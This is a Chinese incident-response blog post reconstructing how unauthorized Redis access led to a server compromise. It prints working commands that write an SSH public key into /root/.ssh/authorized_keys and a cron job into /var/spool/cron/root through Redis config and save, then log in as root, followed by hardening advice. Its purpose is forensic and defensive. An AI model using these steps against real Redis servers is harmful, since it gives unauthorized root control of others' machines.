【应急响应】redis未授权访问致远程植入挖矿脚本(攻击篇)

0 继续篇章

在上一篇【应急响应】redis未授权访问致远程植入挖矿脚本(防御篇)中,从防御的角度详细描述了应急响应以及流程。本篇继续从日志等入侵痕迹中分析,寻求突破,以一个攻击者的角度还原redis攻击,从未授权访问到写入ssh公钥直至控制整台服务器,进一步确定此次勒索事件的根本原因。

1 入侵痕迹

1.1 查看近期文件更改情况

查看最近一个月更改的文件

find -type f -mtime -30

1.2 服务器上查看可疑文件

使用root账号登录x.x.x.x,在根目录下查看ssh相关的可疑文件。

ls –al

进入ssh文件夹,查看ssh文件内容:

cd .ssh/ls –alcat authorized_keyscat authorized_keys_20170318cat authorized_keys.bak20170319

2 漏洞排查

2.1 bash漏洞扫描

从执行命令记录分析,可疑操作:测试bash远程解析命令执行漏洞的poc语句。

因此对该主机进行漏洞扫描,未发现存在bash漏洞。

2.2 redis未授权访问漏洞验证

使用redis客户端尝试连接x.x.x.x成功,且发现ssh公钥

执行服务器操作指令,获取redis以及服务器基本信息:

info

获取cat:

config get dir

设置redis备份路径(以此说明redis权限过大,具有root权限)

config set dir /root

3 攻击过程

通过结合服务器被入侵痕迹与漏洞情况进行分析,判定:主机x.x.x.x由于Redis未授权访问漏洞,造成SSH免密码登录。

为了更好地理解该主机如何被入侵至沦陷,现将模拟黑客手法还原整个攻击过程。

3.1 kali下本地生成公私钥

ssh-keygen -t rsa

3.2 公钥写入文件

(echo-e"\n\n";cat id_rsa.pub;echo-e"\n\n")>foo.txt

3.3 连接redis写入文件

cat /home/Yxiu/.ssh/foo.txt | ./redis-cli -h x.x.x.y -x set sectest20170410config set dir /root/.ssh/config get dirconfig set dbfilename"authorized_keys"save

3.4 redis客户端确认写入情况

sectest20170410写入成功

3.5 linux任务计划设置权限

有时候在利用redis写公钥后依然不能空密码登录,可能是由于authorized_keys的权限问题,可通过linux任务计划来设置权限为600

echo -e “\n\n*/1 * * * * /bin/chmod 600 ~/.ssh/authorized_keys\n\n”|redis-cli -h x.x.x.y -x set 1redis-cli -h x.x.x.y config set dir /var/spool/cron/redis-cli -h x.x.x.y config set dbfilename rootredis-cli -h x.x.x.y save

3.6 ssh公钥成功空密远程登录

root@kali:~/.ssh# ssh -i id_rsa root@x.x.x.y

4 修复建议

<1>权限设置

将redis权限设置为最小化权限,禁止使用root权限运行。区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config。

<2>端口设置

配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379。

<3>强口令设置

对redis设置强口令,禁止未授权访问。

原文发布于微信公众号 - 我的安全视界观(CANI_Security)

原文发表时间:2017-12-25

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

当Strust2遇到防火墙,你的思路够骚吗?

PS:本次测试仅仅做为学习,漏洞已经提交给管理员,请勿用于非法用途,所产生的一切后果与作者无关。文章如果有问题,欢迎大家及时指正!

1086
来自专栏FreeBuf

浅析PyCmd加密隐形木马

之前写了一个基于python的一句话木马客户端程序,这个程序的作用大致就是为了绕过防护设备,使敏感数据能在网络里自由穿梭。由于编程能力有限,当时以python程...

3423
来自专栏FreeBuf

当心,安卓远控(spynote)升级了……

最近在某国外论坛上流出一款安卓远控spynote3.2版本,以前freebuf上有人发过spynots2.4版的,不过现在已经升级了,功能变得更加强大,危害更严...

2628
来自专栏性能与架构

web安全 - 文件上传漏洞

文件上传本身是互联网中最为常见的一种功能需求,所以文件上传漏洞攻击是非常常见,并且是危害极大的 常见安全问题 1) 上传文件是Web脚本语言,服务器的Web...

2837
来自专栏Youngxj

记一次IP反查

1943
来自专栏魏艾斯博客www.vpsss.net

Linux VPS 禁用 root 账号 保障系统安全

黑客入侵从账号入手,一般用软件扫描弱口令或者猜测登陆账号,为了保障 linux 系统安全,我们可以把默认 root 账号改成只有自己知道的账号,这样从入口安全方...

954
来自专栏玄魂工作室

CTF实战11 任意下载漏洞

该培训中提及的技术只适用于合法CTF比赛和有合法授权的渗透测试,请勿用于其他非法用途,如用作其他非法用途与本文作者无关

1053
来自专栏云计算教程系列

如何在Ubuntu 14.04上为IRC安装Lita Chat Bot

许多现代DevOps团队在聊天室周围建立了越来越多的基础设施。有很多聊天室,从商业选项(如HipChat和Slack)到DIY选项(如IRC或Jabber / ...

461
来自专栏Seebug漏洞平台

DeDeCMS v5.7 密码修改漏洞分析

织梦内容管理系统(DedeCms)以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的...

4288
来自专栏云鼎实验室的专栏

MySQL 成勒索新目标,数据服务基线安全问题迫在眉睫

据最新报道显示,继 MongoDB 和 Elasticsearch 之后,MySQL 成为下个数据勒索目标,基线安全问题已经成了 Web 漏洞之外入侵服务器的主...

3.2K2

扫码关注云+社区